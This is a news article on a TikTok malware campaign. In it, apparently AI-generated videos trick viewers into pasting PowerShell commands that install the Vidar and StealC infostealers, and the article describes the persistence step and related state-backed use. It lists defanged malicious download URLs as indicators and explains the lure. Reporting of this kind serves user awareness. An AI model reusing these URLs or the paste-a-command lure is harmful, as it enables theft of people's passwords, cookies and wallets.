Cybercriminals are taking advantage of TikTok in a rather devious way: they are uploading videos that trick people into unwittingly installing malware that steals personal information. We're talking about Vidar and StealC, two types of malware designed to sneak onto your computer and steal everything from passwords to banking data.
The most worrying thing is how they do it. They use videos that, in many cases, seem to be generated with artificial intelligence, where they explain step by step how to “activate” Windows, Microsoft Office or premium functions in apps such as CapCut and Spotify. But these so-called tricks include PowerShell commands that are actually instructions for infecting your computer.
And because TikTok can make a video go viral in minutes, these hoaxes can easily reach hundreds of thousands of people before anyone even questions them.
The videos that are circulating are almost identical to each other. The camera angles or the URL that appears to download the file change a bit, but other than that, they are practically copies. All of this points to the fact that they are probably being generated in an automated fashion.
In addition, the voice guiding the video sounds quite robotic, as if it was made by an artificial intelligence, which reinforces the idea that there is no real person behind it, but automatic tools creating content en masse.
To give you an idea of the reach: one of these videos, which supposedly teaches you how to “improve your Spotify experience instantly,” already has almost half a million views, more than 20,000 “likes” and more than 100 comments. That's how easily they spread.
ClickFix video on TikTok (Source: Trend Micro)
In these videos, the attackers tell people to copy and paste a PowerShell command as part of a supposed “trick” to improve Spotify. But what that command actually does is download a script from a suspicious site (hxxps://allaivo[.]me/spotify) that installs malware like Vidar or StealC. And not only that: the script runs in the background, with elevated permissions, without you even realizing what's going on.
Once the malware gets into your computer, Vidar can do everything: take screenshots of your desktop, steal your saved passwords, card data, browser cookies, personal files and even information from your authentication apps like Authy.
StealC is also quite aggressive. It gets into dozens of browsers and cryptocurrency wallets to steal any information it finds useful.
And if that wasn't enough, after infecting your computer, the script downloads another PowerShell command from another site (hxxps://amssh[.]co/script[.]ps1) that makes the malware run automatically every time you turn on your computer. It's as if it installed itself to live there, silently.
Flujo de ataque (Fuente: Trend Micro)
Read more: Download Magis TV: What They DON'T Tell You When Installing It
ClickFix is a deceptive tactic that attackers use to make people install malware without realizing it. How do they do it? Very simple: they display fake messages, such as system errors or CAPTCHA-like checks, which are actually designed to get you to run a malicious script. Once you do, the malware is downloaded and installed on your device.
While most of these attacks are aimed at Windows users (using PowerShell commands) versions adapted for macOS and Linux have also been seen, so no one is completely out of the woods.
And we're not just talking about common criminals: even government-backed cyber-espionage groups have used this technique. Teams like APT28 and ColdRiver (linked to Russia), Kimsuky (from North Korea) and MuddyWater (from Iran) have employed similar methods in digital espionage campaigns in recent months.
Incredible as it may seem, this is not the first time TikTok has become a channel for distributing malware. Some time ago, attackers took advantage of a viral challenge called “Invisible Challenge” to trick thousands of people into downloading a supposed app, which actually installed WASP Stealer, a malware that stole Discord accounts, passwords, credit cards and even cryptocurrency wallets.
And it doesn't stop there: hundreds of videos have also been seen on TikTok with fake cryptocurrency sweepstakes, using well-known names such as Elon Musk, Tesla or SpaceX to lure people into the trap. In short: what looks like just entertainment can sometimes hide something quite shady.